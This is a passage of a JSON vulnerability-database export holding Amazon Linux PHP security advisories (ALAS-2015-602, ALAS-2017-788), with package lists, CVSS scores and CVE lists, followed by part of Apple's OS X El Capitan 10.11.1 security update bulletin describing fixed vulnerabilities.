php55-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-devel-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-imap-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-recode-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-intl-5.5.30-1.110.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-gd-5.5.30-1.110.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php55-5.5.30-1.110.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php55-cli-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-common-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-intl-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-process-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-dba-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pspell-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-recode-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xml-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-imap-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-soap-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-embedded-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-devel-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gd-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.30-1.110.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.30-1.110.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-20T14:52:00", "type": "amazon", "title": "Medium: php55", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2016-03-16T16:30:00", "id": "ALAS-2015-602", "href": "https://alas.aws.amazon.com/ALAS-2015-602.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-25T19:27:36", "description": "**Issue Overview:**\n\nThe SplObjectStorage unserialize implementation in ext/spl/spl_observer.c in PHP before 7.0.12 does not verify that a key is an object, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access) via crafted serialized data. (CVE-2016-7480)\n\nUse-after-free vulnerability in the CURLFile implementation in ext/curl/curl_file.c in PHP 7.x before 7.0.12 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that is mishandled during __wakeup processing. (CVE-2016-9137)\n\nStack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value. (CVE-2016-9933)\n\next/wddx/wddx.c in PHP 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string. (CVE-2016-9934)\n\nThe php_wddx_push_element function in ext/wddx/wddx.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document. (CVE-2016-9935)\n\nThe unserialize implementation in ext/standard/var.c in PHP 7.x before 7.0.14 allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted serialized data. This vulnerability exists because of an incomplete fix for CVE-2015-6834. (CVE-2016-9936)\n\n \n**Affected Packages:** \n\n\nphp70\n\n \n**Issue Correction:** \nRun _yum update php70_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php70-pspell-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-bcmath-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mbstring-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mysqlnd-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-mcrypt-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-imap-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-intl-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-xmlrpc-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-enchant-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-debuginfo-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-embedded-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-zip-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-dbg-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-soap-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-snmp-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-common-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-gd-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-ldap-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-gmp-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-cli-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-devel-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-tidy-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-xml-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pdo-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-dba-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-process-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-recode-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pgsql-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-pdo-dblib-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-fpm-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-opcache-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-json-7.0.14-1.20.amzn1.i686 \n \u00a0\u00a0\u00a0 php70-odbc-7.0.14-1.20.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php70-7.0.14-1.20.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php70-embedded-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-json-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pdo-dblib-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-common-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-intl-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-cli-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-soap-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pspell-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-xmlrpc-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-zip-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-enchant-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-gd-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mysqlnd-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-imap-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-recode-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mcrypt-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-gmp-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-mbstring-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-xml-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pdo-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-pgsql-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-debuginfo-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-dba-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-process-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-devel-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-fpm-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-ldap-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-bcmath-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-opcache-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-snmp-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-odbc-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-tidy-7.0.14-1.20.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php70-dbg-7.0.14-1.20.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-26T18:00:00", "type": "amazon", "title": "Medium: php70", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2016-7480", "CVE-2016-9137", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936"], "modified": "2017-01-26T18:00:00", "id": "ALAS-2017-788", "href": "https://alas.aws.amazon.com/ALAS-2017-788.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T19:08:46", "description": "No description provided", "edition": 2, "cvss3": {}, "published": "2015-09-15T00:00:00", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2015-09-15T00:00:00", "id": "SECURITYVULNS:VULN:14694", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14694", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "description": "\r\n\r\nAPPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update\r\n2015-007\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 are now\r\navailable and address the following:\r\n\r\nAccelerate Framework\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in the Accelerate\r\nFramework in multi-threading mode. This issue was addressed through\r\nimproved accessor element validation and improved object locking.\r\nCVE-ID\r\nCVE-2015-5940 : Apple\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Multiple vulnerabilities in PHP\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.29 and 5.4.45. These were addressed by updating PHP to\r\nversions 5.5.29 and 5.4.45.\r\nCVE-ID\r\nCVE-2015-0235\r\nCVE-2015-0273\r\nCVE-2015-6834\r\nCVE-2015-6835\r\nCVE-2015-6836\r\nCVE-2015-6837\r\nCVE-2015-6838\r\n\r\nATS\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted webpage may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in ATS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nAudio\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode\r\nDescription: An uninitialized memory issue existed in coreaudiod.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-7003 : Mark Brand of Google Project Zero\r\n\r\nAudio\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Playing a malicious audio file may lead to arbitrary code\r\nexecution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of audio files. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5933 : Apple\r\nCVE-2015-5934 : Apple\r\n\r\nBom\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Unpacking a maliciously crafted archive may lead to\r\narbitrary code execution\r\nDescription: A file traversal vulnerability existed in the handling\r\nof CPIO archives. This issue was addressed through improved\r\nvalidation of metadata.\r\nCVE-ID\r\nCVE-2015-7006 : Mark Dowd of Azimuth Security\r\n\r\nCFNetwork\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to cookies\r\nbeing overwritten\r\nDescription: A parsing issue existed when handling cookies with\r\ndifferent letter casing. This issue was addressed through improved\r\nparsing.\r\nCVE-ID\r\nCVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of\r\nTsinghua University, Jian Jiang of University of California,\r\nBerkeley, Haixin Duan of Tsinghua University and International\r\nComputer Science Institute, Shuo Chen of Microsoft Research Redmond,\r\nTao Wan of Huawei Canada, Nicholas Weaver of International Computer\r\nScience Institute and University of California, Berkeley, coordinated\r\nvia CERT/CC\r\n\r\nconfigd\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to elevate privileges\r\nDescription: A heap based buffer overflow issue existed in the DNS\r\nclient library. A malicious application with the ability to spoof\r\nresponses from the local configd service may have been able to cause\r\narbitrary code execution in DNS clients.\r\nCVE-ID\r\nCVE-2015-7015 : PanguTeam\r\n\r\nCoreGraphics\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: Multiple memory corruption issues existed in\r\nCoreGraphics. These issues were addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5925 : Apple\r\nCVE-2015-5926 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDisk Images\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in the parsing of\r\ndisk images. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6995 : Ian Beer of Google Project Zero\r\n\r\nEFI\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: An attacker can exercise unused EFI functions\r\nDescription: An issue existed with EFI argument handling. This was\r\naddressed by removing the affected functions.\r\nCVE-ID\r\nCVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and\r\nSam Cornwell of The MITRE Corporation, coordinated via CERT/CC\r\n\r\nFile Bookmark\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Browsing to a folder with malformed bookmarks may cause\r\nunexpected application termination\r\nDescription: An input validation issue existed in parsing bookmark\r\nmetadata. This issue was addressed through improved validation\r\nchecks.\r\nCVE-ID\r\nCVE-2015-6987 : Luca Todesco (@qwertyoruiop)\r\n\r\nFontParser\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5927 : Apple\r\nCVE-2015-5942\r\nCVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero\r\nDay Initiative\r\nCVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nFontParser\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nGrand Central Dispatch\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted package may lead to\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in the handling of\r\ndispatch calls. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6989 : Apple\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to cause unexpected system\r\ntermination or read kernel memory\r\nDescription: Multiple out of bounds read issues existed in the\r\nNVIDIA graphics driver. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7019 : Ian Beer of Google Project Zero\r\nCVE-2015-7020 : Moony Li of Trend Micro\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-7021 : Moony Li of Trend Micro\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5935 : Apple\r\nCVE-2015-5938 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5936 : Apple\r\nCVE-2015-5937 : Apple\r\nCVE-2015-5939 : Apple\r\n\r\nIOAcceleratorFamily\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in\r\nIOAcceleratorFamily. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6996 : Ian Beer of Google Project Zero\r\n\r\nIOHIDFamily\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with kernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6974 : Luca Todesco (@qwertyoruiop)\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10.5\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A type confusion issue existed in the validation of\r\nMach tasks. This issue was addressed through improved Mach task\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker with a privileged network position may be able\r\nto execute arbitrary code\r\nDescription: An uninitialized memory issue existed in the kernel.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-6988 : The Brainy Code Scanner (m00nbsd)\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local application may be able to cause a denial of service\r\nDescription: An issue existed when reusing virtual memory. This\r\nissue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-6994 : Mark Mentovai of Google Inc.\r\n\r\nlibarchive\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: An issue existed within the path validation logic for\r\nsymlinks. This issue was addressed through improved path\r\nsanitization.\r\nCVE-ID\r\nCVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer\r\n\r\nMCX Application Restrictions\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: A developer-signed executable may acquire restricted\r\nentitlements\r\nDescription: An entitlement validation issue existed in Managed\r\nConfiguration. A developer-signed app could bypass restrictions on\r\nuse of restricted entitlements and elevate privileges. This issue was\r\naddressed through improved provisioning profile validation.\r\nCVE-ID\r\nCVE-2015-7016 : Apple\r\n\r\nNet-SNMP\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker in a privileged network position may be able to\r\ncause a denial of service\r\nDescription: Multiple issues existed in netsnmp version 5.6. These\r\nissues were addressed by using patches affecting OS X from upstream.\r\nCVE-ID\r\nCVE-2012-6151\r\nCVE-2014-3565\r\n\r\nOpenGL\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in OpenGL. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5924 : Apple\r\n\r\nOpenSSH\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to conduct impersonation attacks\r\nDescription: A privilege separation issue existed in PAM support.\r\nThis issue was addressed with improved authorization checks.\r\nCVE-ID\r\nCVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH\r\n\r\nSandbox\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: An input validation issue existed when handling NVRAM\r\nparameters. This issue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical\r\nInstitute, Apple\r\n\r\nScript Editor\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker may trick a user into running arbitrary\r\nAppleScript\r\nDescription: In some circumstances, Script Editor did not ask for\r\nuser confirmation before executing AppleScripts. This issue was\r\naddressed by prompting for user confirmation before executing\r\nAppleScripts.\r\nCVE-ID\r\nCVE-2015-7007 : Joe Vennix of Rapid7\r\n\r\nSecurity\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: A double free issue existed in the handling of\r\nAtomicBufferedFile descriptors. This issue was addressed through\r\nimproved validation of AtomicBufferedFile descriptors.\r\nCVE-ID\r\nCVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey\r\nUlanov from the Chrome Team\r\n\r\nSecurityAgent\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application can programmatically control\r\nkeychain access prompts\r\nDescription: A method existed for applications to create synthetic\r\nclicks on keychain prompts. This was addressed by disabling synthetic\r\nclicks for keychain access 